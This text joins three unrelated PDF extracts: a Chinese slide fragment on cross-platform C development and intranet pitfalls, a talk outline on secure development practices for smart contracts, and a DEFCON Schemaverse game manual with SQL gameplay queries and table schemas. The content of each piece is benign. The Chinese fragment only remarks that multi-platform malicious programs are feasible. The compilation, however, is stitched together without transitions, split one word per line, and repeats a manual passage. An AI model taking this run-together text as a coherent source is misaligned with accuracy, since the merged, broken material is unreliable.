高效、体系完善、周边工具多、
有协议实现的样例代码
如何填坑
还有哪些要注意的
A.
等价 API 抽象层
不同平台的 API 提供有差异。
B.
编译环境搭建
Linux :
$ sudo apt-get install gcc
MacOS:
Xcode 装好就有对应的 gcc 了
Windows:
MINGW32 + gcc
其他嵌入式设备:
Linux + buildroot(Toolchain)
C. Big/Little -Endian
由于 CPU 存在差异化,而选定的实现语言为 C,
所以编码时要注意规避这类问题。
2 如何填坑
1 内网中的那些坑
目录
3 一些思考
一些思考
1. 多平台、原生层、恶意程序、可行。
2. 重视内网安全。
3. 小心身边的智能设备。
谢谢! | pdf |
Secure SDLC Practices in
Smart Contracts Development
Speaker: Pavlo Radchuk
@rdchksec
2018
AppSec Engineer with Masters degree (several of experience)
Smart Contract Audit Team Lead
My team performs 7-10 audits per month
About me
Conducting different researches for new techniques, vulns etc.
Analyzing competitors reports – they are quite different
See all the problems from inside …
What do my team do
There are some best practices for Ethereum Solidity, but none for EOS,
NEO, NEM, etc.
Audit Problems
No compliances (e.g. PCI DSS)
No certifications (e.g. OSCP)
No industry accepted standards and guidelines (e.g. OWASP testing guide)
Audit says smart contracts is secure != Secure Smart Contract
Despite all the drawbacks – an audit is still the best
solution for smart contract security
Audits alone are not enough – so what can be done?
What can help with Smart Contracts Security
SDLC is a term used in systems engineering,
information systems and software engineering to
describe a process for planning, creating, testing,
and deploying an information system*
* https://www.cms.gov/Research-Statistics-Data-and-Systems/CMS-Information-Technology/XLC/Downloads/SelectingDevelopmentApproach.pdf
Secure SDLC
Software Development
Lifecycle
What do web guys
do for security?
Security is achieved
by processes
Classic Web Development Cycle
Typical Smart Contract Development Flow
Smart contracts are immutable after deployment
Web vs Smart Contracts
Web
Smart Contracts
•
Some Code Run on Servers
•
Code can be changed
• Some Code Run on Nodes
• If you use proxies – code can be changed (for instance, zos
for Solidity)
Development process contains – requirements, programming, testing, deployment, maintenance
•
Existing development guides, pentesting methodologies
and compliances
• Some unformalized best practices
How to "buidl" a secure smart contract?
Process
SDLC Practices
1. Threat Assessment
2. Security Requirements
3. Developer Education
4. Private Key Management
5. QA Testing
6. Security Testing
7. Compliance
1. Threat Assessment
What ifs:
•
What if the only copy of private key is lost
•
What if Ethereum gets hacked/DoSed etc. – can you fully rely on a third party?
•
What if your token/wallet/etc. gets hacked
Understanding threats:
You need to understand the risks and
accept/mitigate/transfer them
2. Security Requirements
One of the most widespread bugs – absence of
security modifiers
All Security modifiers should be defined
Particularly, all function with all modifiers
predefined and documented
https://github.com/trailofbits/not-so-smart-contracts/blob/master/unprotected_function/Unprotected.sol
3. Developer Education
Examples for Solidity:
•
Reentrancy
•
Unchecked math
•
Timestamp Dependence
•
Unchecked external call
Developers should know common vulnerabilities/attacks:
4. Private Key Management
Contract management architecture –operator and other management
accounts; Multisig wallets
How and where PKs are stored and used?
5. QA Testing
•
Fixes during development
•
Proxies and operators for deployed contracts
Unit and other
QA tests
How fixes
should be done
Testing against security requirements
Audit
One more audit
Bug Bounty
*https://blog.hackenproof.com/industry-news/smart-contracts-bug-hunting/
6. Security Testing
7. Compliance
Legal compliance – KYC for anti money laundering etc.
Technical compliance – security requirements (like PCI DSS)
Listing requirements – security audits
Audits are a must, but not enough
Security needs a process
Developers need our help
Conclusion
Web security SDLC practices are applicable for Smart Contracts
We develop best practices/recommendations
Contact me if you want to participate
Conclusion
Contacts
Speaker: Pavlo Radchuk
Twitter: @rdchksec
WeChat: @rdchksec
Email: [email protected] | pdf |
How
the
hell
do
you
play
this
game?
Page
2
of
42
An
Introduction........................................................................................................... 4
A
Thank
you ................................................................................................................ 4
Getting
Started............................................................................................................ 5
What
does
the
universe
look
like?......................................................................................................................5
Creating
some
Ships..................................................................................................................................................5
Moving
around ............................................................................................................................................................6
Actions
...........................................................................................................................................................................8
What
the
hell
is
going
on
........................................................................................................................................9
Buying
Upgrades ........................................................................................................................................................9
The
Tic
(or
flow
of
game) ....................................................................................................................................10
Fleets.............................................................................................................................................................................11
Fleet
Programming
Tips.......................................................................................................................................11
Random
Details......................................................................................................... 13
Planets..........................................................................................................................................................................13
3
Really
Useful
Functions ....................................................................................................................................13
Quick
Start
Steps....................................................................................................... 14
Tables........................................................................................................................ 16
action............................................................................................................................................................................16
event .............................................................................................................................................................................16
fleet................................................................................................................................................................................17
item................................................................................................................................................................................18
item_location.............................................................................................................................................................18
planet............................................................................................................................................................................18
planet_miners ...........................................................................................................................................................19
player............................................................................................................................................................................19
player_inventory......................................................................................................................................................20
player_trophy............................................................................................................................................................20
price_list......................................................................................................................................................................20
ship................................................................................................................................................................................20
ship_control ...............................................................................................................................................................21
ship_flight_recorder ...............................................................................................................................................22
stat_log.........................................................................................................................................................................22
trade..............................................................................................................................................................................23
trade_item...................................................................................................................................................................23
trophy...........................................................................................................................................................................23
variable........................................................................................................................................................................24
Views ........................................................................................................................ 25
my_events...................................................................................................................................................................25
my_fleets .....................................................................................................................................................................25
my_player ...................................................................................................................................................................26
my_player_inventory .............................................................................................................................................26
my_ships......................................................................................................................................................................27
my_ships_flight_recorder.....................................................................................................................................28
ships_in_range ..........................................................................................................................................................28
Page
3
of
42
planets..........................................................................................................................................................................29
my_trades ...................................................................................................................................................................29
trade_items ................................................................................................................................................................29
trade_ship_stats .......................................................................................................................................................30
online_players...........................................................................................................................................................31
current_stats..............................................................................................................................................................31
public_variable .........................................................................................................................................................32
trophy_case................................................................................................................................................................32
Functions................................................................................................................... 33
Getting
around..........................................................................................................................................................33
move(Ship
ID,
Speed,
Direction,
Destination
X,
Destination
Y) ...........................................................33
refuel_ship(Ship
ID)................................................................................................................................................34
Actions .........................................................................................................................................................................34
attack(Attacking
Ship
ID,
Enemy
Ship
ID) ...................................................................................................34
mine(Mining
Ship
ID,
Planet
ID).......................................................................................................................35
repair(Repair
Ship
ID,
Damaged
Ship
ID) ....................................................................................................36
Purchasing
and
Trading .......................................................................................................................................36
convert_resource(Current
Resource
Type,
Amount
to
Convert).........................................................36
upgrade(Ship
ID
|
Fleet
ID,
Product
Code,
Quantity)...............................................................................37
Utilities.........................................................................................................................................................................38
get_char_variable(Variable
Name) .................................................................................................................38
get_numeric_variable(Variable
Name)..........................................................................................................38
get_player_id(Player
Username).......................................................................................................................39
get_player_username(Player
ID)......................................................................................................................39
get_player_error_channel(Player
Username
[DEFAULT
SESSION_USER])....................................40
in_range_planet(Ship
ID,
Planet
ID)................................................................................................................40
in_range_ship(Ship
ID,
Ship
ID).........................................................................................................................41
read_event(Event
ID).............................................................................................................................................41
Page
4
of
42
An
Introduction
Welcome
to
the
Schemaverse!
Your
mission
in
this
game
is
to
fly
around
the
universe
and
conquer
more
planets
than
any
of
the
other
players.
To
accomplish
this
mission,
you
will
need
to
give
your
fleets
strategies
to
follow,
build
new
ships,
and
upgrade
your
ships’
statistics
so
that
they
can
attack,
defend,
repair,
and
mine
resources
from
the
planets
you
come
across.
It's
a
pretty
standard
space
battle
game
really.
But,
there
is
one
minor
difference.
There
is
no
pretty
interface.
Unless
you
write
one,
this
universe
exists
purely
in
the
form
of
data.
To
join
the
battle,
head
over
to
the
DEFCON
Contest
Area
and
register.
A
Thank
You
To
all
my
friends
that
helped
put
this
document
together,
gave
input
on
the
presentation
and
spent
countless
hours
testing
The
Schemaverse,
I
really
can’t
thank
you
enough.
Especially
Tigereye,
appl,
rick,
Saint
and
Netlag,
this
would
not
have
happened
without
all
your
help.
Our
sponsors
below
also
deserve
a
big
thank
you.
Their
fantastic
contributions
for
prizes
have
helped
to
legitimize
the
tournament
in
its
first
year
and
enhance
the
level
of
competition.
-‐Abstrct
Page
5
of
42
Getting
Started
What
does
the
universe
look
like?
So
where
is
it
best
to
begin?
Well
first
off
you
should
take
a
look
around.
Run
the
following
SELECT
statement
to
see
what
planets
fill
up
the
universe:
SELECT
*
FROM
planets;
Since
you
are
just
starting
out,
seeing
only
the
closest
planets
would
probably
be
more
helpful.
SQL
is
your
friend
here!
Just
change
the
statement,
as
you
would
expect:
SELECT
*
FROM
planets
WHERE
location_x
BETWEEN
-5000
AND
5000
AND
location_y
BETWEEN
-5000
AND
5000;
Every
player
is
made
the
conqueror
of
a
random
planet
at
the
time
of
registration.
Look
for
your
player_id
in
the
conqueror_id
column
of
the
planets
view
and
start
here!
Creating
some
Ships
Seeing
as
this
game
is
about
flying
space
ships
around,
you'll
probably
want
at
least
one
of
those.
You
can
create
a
ship
at
any
time
for
the
cost
of
1000
credits.
INSERT
INTO
my_ships(name)
VALUES('Shipington');
There
are
some
values
of
the
ship
that
you
can
change
right
off
the
bat.
These
values
are
the
ship’s
Attack,
Defense,
Engineering
(repair),
and
Prospecting
(mining)
abilities.
So
long
as
these
values
add
up
to
20,
you
can
distribute
them
as
you
see
fit.
The
default
value
for
each
is
5.
For
example,
if
you
wanted
to
build
a
ship
meant
for
killing,
you
may
want
to
create
a
ship
like
so:
INSERT
INTO
my_ships(name,
attack,
defense,
engineering,
prospecting)
VALUES('My
First
Attacker',15,5,0,0);
All
these
skills
can
be
upgraded;
these
initial
values
are
just
a
starting
point
for
your
ship.
You
can
now
take
a
look
at
your
huge
fleet
of
1
ship
by
checking
out
your
my_ships
view:
SELECT
*
FROM
my_ships;
Page
6
of
42
Do
you
want
to
see
if
there
are
any
ships
around
you
currently?
You
can
use
the
ships_in_range
view
for
that:
SELECT
*
FROM
ships_in_range;
You
can
also
specify
the
starting
location
of
your
ships
during
an
insert
like
so:
INSERT
INTO
my_ships(name,
location_x,
location_y)
VALUES(“My
Strategically
Placed
Ship”,
100,
100);
There
is
a
catch
though!
You
can
only
create
a
ship
where
one
of
the
following
is
true
• location_x
and
location_y
is
between
-‐3000
and
3000
• location_x
and
location_y
are
the
same
coordinates
as
a
planet
you
are
the
current
conqueror
of
Moving
around
To
move
around,
you
can
use
the
command
aptly
named
Move()
which
is
defined
like
this:
Move(Ship
ID,
Speed,
Direction,
Destination
X,
Destination
Y)
Ship
ID
should
be
an
ID
of
one
of
your
own
ships,
speed
is
the
distance
you
will
travel
in
one
tic
and
direction
is
a
value
between
0
and
360
(in
this
game,
space
is
2D).
I’m
not
hardcore
enough
for
a
3D
SQL
based
space
game.
That
would
just
be
weird.
If
you
want
to
calculate
the
direction
automatically
based
on
your
specified
destination_x
and
destination_y
coordinates,
simply
set
direction
as
NULL
and
it
will
be
filled
in
for
you.
Page
7
of
42
Now,
assuming
you
want
to
move
all
your
ships
at
the
same
time,
there
is
nothing
stopping
you
from
doing
the
following:
SELECT
MOVE(id,100,
200,
destination_x,
destination_y),
id,
name,
location_x,
location_y
FROM
my_ships;
When
using
the
MOVE()
function,
you
can
call
it
in
two
ways:
”I
want
to
go
there”
If
you
know
your
destination
coordinates,
you
can
specify
these
as
the
last
two
parameters
in
the
MOVE()
function.
MOVE()
will
calculate
how
much
fuel
it
would
take
to
accelerate
you
to
the
specified
speed,
and
decelerate
you
when
you
reach
that
destination.
If
your
ship
has
enough
fuel,
the
MOVE()
command
will
return
true
(‘t’)
and
you
will
be
on
your
way.
If
you
don’t
have
enough
fuel,
your
error
channel
will
report
this.
See
“What
the
hell
is
going
on”
below
for
more
information.
”I
want
to
go
that
way”
If
you
don’t
specify
a
destination
manually,
you
must
specify
a
manual
direction.
This
will
set
your
ship
on
course
and
no
fuel
calculations
will
be
made
to
ensure
you
are
able
to
stop
since
you
don’t
have
a
destination.
Page
8
of
42
Keep
in
mind
that
that
each
ship
can
only
move
once
per
game
tic.
So,
if
you
use
Move()
on
a
ship,
you
will
not
be
able
to
run
Move()
on
that
ship
again
until
tic.pl
is
run.
At
the
end
of
each
tic,
every
ship
(which
has
not
had
the
MOVE
command
run
manually
on
it)
will
progress
in
the
direction
specified
in
the
ship’s
control
information.
If
the
ship
has
reached
its
destination
(if
one
exists),
the
ship
will
try
to
stop
(if
there’s
enough
fuel).
You
can
see
this
information
for
all
your
ships
with
SELECT
direction,
speed,
current_fuel
from
my_ships;
To
update
this
data
for
all
your
ships,
you
could
run:
UPDATE
my_ships
SET
direction=180,
speed=20
WHERE
1=1;
If
you
wanted
only
a
single
ship,
the
command:
UPDATE
my_ships
SET
direction=90,
speed=10
WHERE
name='Shipington'
If
your
ships
run
out
of
fuel,
you
can
fill
them
up
with
the
fuel
in
your
my_player.fuel_reserve.
This
command
would
refuel
all
your
ships
at
once:
SELECT
REFUEL_SHIP(id),
id
FROM
my_ships;
Actions
Outside
of
moving
around,
there
are
three
main
actions
that
a
ship
can
perform
once
per
tic.
These
actions
must
be
performed
on
ships
and/or
planets
that
are
within
range
of
the
ship.
If
a
ship
is
down
to
0
health
it
will
not
be
able
to
perform
any
of
them
until
it
is
repaired.
These
actions
are
as
follows:
• Attack(AttackerShip,
EnemyShip)
SELECT
Attack(ship_in_range_of,
id),
name
FROM
ships_in_range;
This
would
cause
all
of
your
ships
to
attempt
to
attack
any
ship
that
is
in
range.
• Repair(RepairShip,
DamagedShip
)
SELECT
Repair(10,
id)
FROM
my_ships
ORDER
BY
current_health
ASC;
This
would
use
ship
with
ID
10
to
repair
the
most
damaged
ship
you
own.
• Mine(MinerShip,
Planet)
SELECT
mine(9,
1);
Page
9
of
42
In
this
example,
my
ship
with
ID
9
would
try
to
mine
planet
1.
This
adds
the
ship
to
the
planet_miners
table
and
at
the
end
of
a
tic,
the
system
will
decide
who
in
the
table
is
awarded
fuel
from
the
planet.
What
the
hell
is
going
on
As
you
play
the
game,
you
may
want
to
keep
track
of
what
is
actually
happening
(or
you
may
not…).
To
do
so,
you
can
watch
the
my_events
view.
To
see
it
ordered
with
the
latest
events
at
the
top
you
could
do
the
following:
SELECT
*
FROM
my_events
ORDER
BY
toc
DESC;
If
you
would
like
a
more
readable
version
of
events,
use
the
read_event()
function
within
the
select
statement
like
so:
SELECT
READ_EVENT(event_id)
FROM
my_events
ORDER
BY
toc
DESC;
There
will
also
be
times
where
things
just
don’t
seem
to
be
working
right.
Originally,
this
game
had
an
error
log
table,
but
it
just
grew
out
of
control
constantly
and
was
pretty
much
useless.
So,
the
solution
to
this
was
to
utilize
the
NOTIFY
and
LISTEN
commands
to
create
an
error
channel
that
you
can
listen
on.
Check
your
my_players
view
to
find
your
error
channel
and
if
your
PostgreSQL
client
allows
it,
you
can
use:
LISTEN
<channel
name>;
With
every
next
query
you
make
(until
UNLISTEN),
the
response
will
include
any
new
messages
to
your
channel.
If
your
client
doesn’t
support
it
or
it
just
doesn’t
seem
that
convenient,
fear
not!
If
you
can
get
python
working
on
your
system
then
you
use
the
Schemaverse
SOS
client,
SchemaverseOutputStream.py,
from
our
GitHub
repository
(https://github.com/Abstrct/Schemaverse/tree/master/clients/SchemaverseOutp
utStream).
Buying
Upgrades
To
upgrade
your
ship
use
the
function:
UPGRADE
(Ship
ID,
Code,
Quantity)
The
following
is
the
price
list
at
the
time
of
publishing:
code
cost
description
MAX_HEALTH
50
Increases a ships MAX_HEALTH by one
MAX_FUEL
1
Increases a ships MAX_FUEL by one
MAX_SPEED
1
Increases a ships MAX_SPEED by one
RANGE
25
Increases a ships RANGE by one
ATTACK
25
Increases a ships ATTACK by one
DEFENSE
25
Increases a ships DEFENSE by one
ENGINEERING
25
Increases a ships ENGINEERING by one
PROSPECTING
25
Increases a ships PROSPECTING by one
Page
10
of
42
There
are
certain
limits
regarding
how
much
you
can
upgrade
your
ships.
Those
values
can
all
be
found
in
the
public_variable
view.
At
the
time
of
publishing,
they
were:
Ability
Max Value
MAX_SHIP_SKILL
500
MAX_SHIP_RANGE
2000
MAX_SHIP_FUEL
5000
MAX_SHIP_SPEED
2000
MAX_SHIP_HEALTH
1000
The
Tic
(or
flow
of
game)
A
tic
is
a
unit
of
time
in
the
Schemaverse.
Tics
occur
approximately
every
minute,
but
they
can
vary
depending
on
how
long
it
takes
to
execute
fleet
scripts.
There
is
a
cron
job
that
executes
TIC.PL,
which
drives
the
universe
forward
by
moving
ships,
awarding
fuel
for
planets
that
are
currently
being
mined,
and
executing
fleet
scripts.
The
order
of
events
in
tic.pl
is
as
follows:
• Every
ship
moves
based
on
the
ships
direction,
speed
and
destination
coordinates
currently
stored
in
my_ships
• All
fleets
run
their
fleet_script_#()
function
if
they
have
a
runtime
of
at
least
1
minute
and
are
enabled
• Mining
happens
for
all
ships
who
ran
the
mine()
command
that
tic
• Some
planets
randomly
have
their
fuel
increased
• Any
damage/repair
that
occurred
during
the
tic
is
committed
to
the
ship
table
• Any
ships
that
have
been
damaged
to
zero
health
for
the
same
amount
of
tics
as
the
EXPLODED
variable
is
set
to
(currently
60
tics
or
approximately
1
hour)
are
set
to
destroyed
• tic_seq
is
incremented
Every
tic
is
numbered
sequentially
for
the
lifetime
of
the
Schemaverse.
As
mentioned
earlier,
ships
can
only
perform
one
action
per
tic.
Every
time
a
ship
performs
an
action
its
LAST_ACTION
column
is
updated.
You
can
see
the
current
tic
number
by
executing
the
following
SELECT
statement:
SELECT
last_value
FROM
tic_seq;
Page
11
of
42
To
execute
commands
automatically
every
tic,
see
Fleets
below.
Fleets
Fleets
are
essentially
groups
of
ships,
but
with
a
twist.
You
can
attach
PL/pgSQL
code
to
be
executed
each
tic,
along
with
variables
to
track
values
during
the
script’s
execution.
When
your
script
is
executed
each
tic,
the
TIC.PL
script
logs
into
the
Schemaverse
with
your
user
account
and
executes
the
contents
of
every
activated
fleet
script
you
have.
Your
script
can
include
any
SQL
commands
you
can
think
of
and
act
upon
any
ships
you
choose
–
not
just
the
ships
within
that
fleet.
Using
scripts,
you
can
tell
your
ships
to
execute
the
Mine()
action
repeatedly
to
earn
money,
Move()
commands
to
travel
to
other
planets,
as
well
as
Attack(),
Repair(),
Convert_resource(),
and
any
other
SQL
you
can
think
of.
Each
fleet
needs
three
things
in
order
to
be
active:
the
ENABLED
field
to
be
true
(or
‘t’),
some
execution
time
purchased
(using
the
UPGRADE()
function),
and
some
valid
PL/pgSQL
code
to
execute.
Here
are
examples
of
how
you
can
accomplish
this:
INSERT
INTO
my_fleets
(name)
VALUES
(‘My
First
Script’);
UPDATE
my_fleets
SET
script
=
‘PERFORM
Mine(id,
1)
ON
my_ships;’
WHERE
name
=
‘My
First
Script’;
SELECT
UPGRADE(id,
‘FLEET_RUNTIME’,
1);
UPDATE
my_fleets
SET
enabled
=
‘t’
WHERE
name
=
‘My
First
Script’;
Keep
in
mind
that
upgrading
the
runtime
of
a
fleet
costs
10000000 per 1 new minute
of time added.
Fleet
Programming
Tips
• To
escape
quotes
when
updating
your
scripts,
use
two
single
quotes
in
your
PL/pgSQL
(eg:
‘’a
string’’)
• Keep
your
scripts
organized
by
using
comments
within
them
• Call
your
script
directly
to
test
it
for
runtime
errors.
All
Fleet
Scripts
can
be
called
by
using
the
following
syntax:
SELECT
FLEET_SCRIPT_#();
Where
#
is
the
Fleet
ID
of
the
fleet
you
want
to
run.
• Monitor
your
error
channel
to
see
if
fleets
are
running
each
tic
as
you
expect
Page
12
of
42
For
more
examples
of
scripts,
please
visit
the
wiki
at
https://github.com/Abstrct/Schemaverse/wiki/Fleet-‐Scripts
Page
13
of
42
Random
Details
Planets
Planets
can
run
out
of
fuel.
The
actual
amount
of
fuel
a
planet
has
remaining
is
hidden
from
players
but
if
mining
keeps
failing,
you
should
take
that
as
a
hint.
Each
tic
5000
planets
have
their
fuel
replenished.
If
a
planet
is
empty
during
the
current
turn,
it
may
have
more
next
tic.
If
you
conquer
a
planet,
you
can
name
it
with
an
UPDATE
statement
on
the
planets
view.
3
Really
Useful
Functions
GET_PLAYER_ID(username);
GET_PLAYER_NAME(player_id);
Use
these
two
to
convert
back
and
forth
from
the
username
and
player
id.
This
is
mostly
just
to
make
it
so
that
it
feels
like
you
are
actually
playing
against
other
people,
rather
than
against
some
numbers.
Some
examples
of
its
use
include:
SELECT
id,
get_player_id(username),
username,
get_player_username(id)
FROM
my_player;
SELECT
get_player_username(player_id)
FROM
ships_in_range;
Finally,
you
will
need
to
take
note
of
the
function
called
CONVERT_RESOURCE(StartResource,
Quantity).
This
function
will
allow
you
to
sell
your
Reserve_Fuel
for
more
money
(or
the
other
way
around)
to
help
build
up
your
forces.
SELECT
convert_resource(‘FUEL’,500);
SELECT
convert_resource(‘MONEY’,500);
You
can
also
specify
the
starting
location
of
your
ships
during
an
insert
like
so:
INSERT
INTO
my_ships(name,
location_x,
location_y)
VALUES(“My
Strategically
Placed
Ship”,
100,
100);
There
is
a
catch
though!
You
can
only
create
a
ship
where
one
of
the
following
is
true
• location_x
and
location_y
is
between
-‐3000
and
3000
• location_x
and
location_y
are
the
same
coordinates
as
a
planet
you
are
the
current
conqueror
of
Page
14
of
42
Quick
Start
Steps
These
are
the
first
five
queries
you
should
run
to
start
making
money
in
the
game.
Step
1
-
Create
a
ship
at
the
centre
of
the
universe
(where
planet
1
is)
INSERT
INTO
my_ships(name)
values
('My
First
Ship');
Step
2
-
Upgrade
the
ships
mining
ability
SELECT
UPGRADE(id,
'PROSPECTING',
200)
from
my_ships;
Step
3
-
Create
a
fleet
that
will
run
while
you're
not
paying
attention
INSERT
INTO
my_fleets(name)
VALUES('My
First
Fleet');
Step
4
-
Update
the
fleet
to
do
something
UPDATE
my_fleets
SET
script_declarations=
'miners
RECORD;
',
script='
FOR
miners
IN
SELECT
id
FROM
my_ships
LOOP
--Since
I
know
that
1
is
the
center
planet
I
am
just
hardcoding
that
in
PERFORM
MINE(miners.id,
1);
END
LOOP;
',
enabled='t'
WHERE
name
=
'My
First
Fleet'
Step
5
-
Buy
processing
time
for
the
fleet
to
use
every
tic.
This
will
buy
one
minute
(it's
expensive!)
SELECT
UPGRADE(id,
'FLEET_RUNTIME',
1),
id,
name,
enabled
FROM
my_fleets;
Whats
next?
Convert
Fuel
-‐
As
you
mine,
this
increases
the
value
in
your
my_player.fuel_reserve
column.
You
can
use
this
fuel
to
fly
around
but
you
can
also
convert
fuel
to
money
to
buy
all
sorts
of
great
things
like
new
ships,
upgrades
and
fleet
runtime.
This
is
a
statement
that
would
convert
all
your
fuel
to
money:
Page
15
of
42
SELECT
convert_resource('FUEL',
fuel_reserve)
from
my_player;
Buy
more
ships
(Step
1)
Upgrade
more
ships
(Step
2)
Change
on
your
fleet
script
so
that
it
mines,
repairs,
attacks,
creates,
and
travels
(Step
4).
Check
the
event
log
with:
SELECT
READ_EVENT(id),
*
from
my_events;
There
is
also
an
error
stream
the
Schemaverse
sends
out.
It
uses
the
Postgresql
NOTIFY
command,
but
it
is
a
bit
involved
to
describe.
Check
out
the
"What
The
Hell
Is
Going
On?"
section
for
more
details.
Page
16
of
42
Tables
While
browsing
these
tables
you
will
notice
that
for
many
of
them,
a
player
does
not
even
have
the
ability
to
SELECT
from.
This
is
because
this
information
is
hidden
behind
views
to
control
what
a
player
can
see
about
others
in
the
game.
You
may
still
find
this
information
interesting
though
because
if
you
plan
to
create
an
item
or
trophy
you
can
access
any
and
all
information
you
see
below
within
the
item/trophy
script.
action
Column
Type
Player
Permissions
Extra
Details
action
character(20)
Select,
Insert,
Update
string
text
Select,
Insert,
Update
If
you
have
added
an
item
into
the
item
table
then
you
have
the
ability
to
insert/update
an
action
here
so
long
as
action.name
is
the
same
as
item.system_name.
This
allows
for
the
item
to
add
custom
event
logs
when
run.
event
Column
Type
Player
Permissions
Extra
Details
Id
integer
Sequence:event_id_seq
Action
character(20)
player_id_1
integer
FK:player(id)
ship_id_1
integer
FK:ship(id)
player_id_2
integer
FK:player(id)
ship_id_2
integer
FK:ship(id)
referencing_id
integer
descriptor_numeric
numeric
descriptor_string
character
varying
Location_x
integer
Page
17
of
42
Location_y
integer
Public
boolean
Tic
integer
Toc
timestamp
without
time
zone
Default:NOW()
fleet
Column
Type
Player
Permissions
Extra
Details
Id
integer
Sequence:fleet_id_seq
Player_id
integer
FK:player(id)
Name
character
varying(50)
Script
text
The
PL/pgSQL
commands
that
make
the
body
of
your
function
script_declarations
text
The
PL/pgSQL
definitions
that
make
up
the
DECLARE
section
of
your
function
last_script_update_tic
integer
enabled
boolean
runtime
interval
How
many
minutes
of
execution
are
allowed
before
the
script
is
forcefully
aborted
Page
18
of
42
item
Column
Type
Player
Permissions
Extra
Details
System_name
character
varying
Select,
Insert,
Update
Name
character
varying
Select,
Insert,
Update
description
text
Select,
Insert,
Update
Howto
text
Select,
Insert,
Update
persistent
boolean
Select,
Insert,
Update
Default:FALSE
Script
text
Select,
Insert,
Update
creator
integer
Select
FK:player(id)
approved
boolean
Select
Default:FALSE
round_started
integer
Select
item_location
Column
Type
Player
Permissions
Extra
Details
system_name
character
varying
location_x
integer
location_y
integer
planet
Column
Type
Player
Permissions
Extra
Details
id
integer
Sequence:planet_id_seq
name
character
varying(50)
fuel
integer
This
is
hidden
from
players!
mine_limit
integer
Page
19
of
42
location_x
integer
location_y
integer
conqueror_id
integer
FK:player(id)
planet_miners
Column
Type
Player
Permissions
Extra
Details
planet_id
integer
FK:planet(id)
ship_id
integer
FK:ship(id)
player
Column
Type
Player
Permissions
Extra
Details
id
integer
Sequence:player_id_seq
username
character
varying
Unique
created
timestamp
without
timezone
balance
integer
fuel_reserve
integer
password
character(40)
error_channel
character(10)
starting_fleet
integer
FK:fleet(id)
Page
20
of
42
player_inventory
Column
Type
Player
Permissions
Extra
Details
id
integer
Sequence:player_inventory_id_seq
player_id
integer
FK:player(id);
Default:GET_PLAYER_ID(SESSION_USER)
item
character
varying
FK:item(system_name)
quantity
integer
Default:1
player_trophy
Column
Type
Player
Permissions
Extra
Details
round
integer
Select
trophy_id
integer
Select
FK:trophy(id)
player_id
integer
Select
FK:player(id)
price_list
Column
Type
Player
Permissions
Extra
Details
code
character
varying
Select
cost
integer
Select
description
text
Select
ship
Column
Type
Player
Permissions
Extra
Details
id
integer
Sequence:ship_id_seq
Page
21
of
42
fleet_id
integer
player_id
integer
FK:player(id)
name
character
varying
last_action_tic
integer
last_move_tic
integer
last_living_tic
integer
current_health
integer
max_health
integer
Default:100
current_fuel
integer
max_fuel
integer
Default:1100
max_speed
integer
Default:1000
range
integer
Default:300
attack
integer
Default:5
defense
integer
Default:5
engineering
integer
Default:5
prospecting
integer
Default:5
location_x
integer
Default:0
location_y
integer
Default:0
destroyed
boolean
Default:FALSE
ship_control
Column
Type
Player
Permissions
Extra
Details
ship_id
integer
FK:ship(id)
direction
integer
speed
integer
Page
22
of
42
destination_x
integer
destination_y
integer
repair_priority
integer
ship_flight_recorder
Column
Type
Player
Permissions
Extra
Details
ship_id
integer
FK:ship(id)
tic
integer
location_x
integer
location_y
integer
stat_log
Column
Type
Player
Permissions
Extra
Details
current_tic
integer
Select
total_players
integer
Select
online_players
integer
Select
total_ships
integer
Select
avg_ships
integer
Select
total_trades
integer
Select
active_trades
integer
Select
total_fuel_reserve
integer
Select
avg_fuel_reserve
integer
Select
total_currency
integer
Select
Page
23
of
42
avg_balance
integer
Select
trade
Column
Type
Player
Permissions
Extra
Details
id
integer
Sequence:trade_id_seq
player_id_1
integer
FK:player(id)
player_id_2
integer
FK:player(id)
confirmation_1
integer
confirmation_2
integer
complete
integer
trade_item
Column
Type
Player
Permissions
Extra
Details
id
integer
Sequence:trade_item_id_seq
trade_id
integer
FK:trade(id)
player_id
integer
FK:player(id)
description_code
character
varying
quantity
integer
descriptor
character
varying
trophy
Column
Type
Player
Permissions
Extra
Details
id
integer
Select
Sequence:trophy_id_seq
Page
24
of
42
name
character
varying
Select,
Insert,
Update
description
text
Select,
Insert,
Update
picture_link
text
Select,
Insert,
Update
script
text
Select,
Insert,
Update
script_declarations
text
Select,
Insert,
Update
creator
integer
Select
FK:player(id)
approved
boolean
Select
Default:FALSE
round_started
integer
Select
variable
Column
Type
Player
Permissions
Extra
Details
name
character
varying
private
boolean
numeric_value
integer
char_value
character
varying
description
text
Page
25
of
42
Views
As
a
player,
the
views
are
where
you
are
likely
to
spend
most
of
your
time
querying
around
in.
my_events
Column
Type
Player
Permissions
event_id
integer
Select
action
character(20)
Select
player_id_1
integer
Select
ship_id_1
integer
Select
player_id_2
integer
Select
ship_id_2
integer
Select
referencing_id
integer
Select
descriptor_numeric
numeric
Select
descriptor_string
character
varying
Select
location_x
integer
Select
location_y
integer
Select
tic
integer
Select
toc
timestamp
without
time
zone
Select
my_fleets
Column
Type
Player
Permissions
id
integer
Select
name
character
varying(50)
Select,
Insert,
Update
script
text
Select,
Update
Page
26
of
42
script_declarations
text
Select,
Update
last_script_update_tic
integer
Select
enabled
boolean
Select,
Update
runtime
interval
Select
my_player
Column
Type
Player
Permissions
id
integer
Select
username
character
varying
Select
created
timestamp
without
timezone
Select
balance
integer
Select
fuel_reserve
integer
Select
password
character(40)
Select
error_channel
character(10)
Select
starting_fleet
integer
Select,
Update
my_player_inventory
Column
Type
Player
Permissions
id
integer
Select
player_id
integer
Select
item
character
varying
Select
quantity
integer
Select
Page
27
of
42
my_ships
Column
Type
Player
Permissions
id
integer
Select
fleet_id
integer
Select,
Update
player_id
integer
Select
name
character
varying
Select,
Insert,
Update
last_action_tic
integer
Select
last_move_tic
integer
Select
current_health
integer
Select
max_health
integer
Select
current_fuel
integer
Select
max_fuel
integer
Select
max_speed
integer
Select
range
integer
Select
attack
integer
Select,
Insert
defense
integer
Select,
Insert
engineering
integer
Select,
Insert
prospecting
integer
Select,
Insert
location_x
integer
Select,
Insert
location_y
integer
Select,
Insert
direction
integer
Select,
Update
speed
integer
Select,
Update
destination_x
integer
Select,
Update
destination_y
integer
Select,
Update
Page
28
of
42
repair_priority
integer
Select,
Update
When
performing
an
INSERT
on
the
my_ships
view,
the
fields
attack,
defense,
engineering,
and
prospecting
can
equal
anything
so
long
as
their
combined
total
is
not
greater
then
20.
Also
during
INSERT,
you
can
use
any
location_x,
location_y
coordinates
that
fall
on
planets
you
currently
have
conquered.
my_ships_flight_recorder
Column
Type
Player
Permissions
ship_id
integer
Select
tic
integer
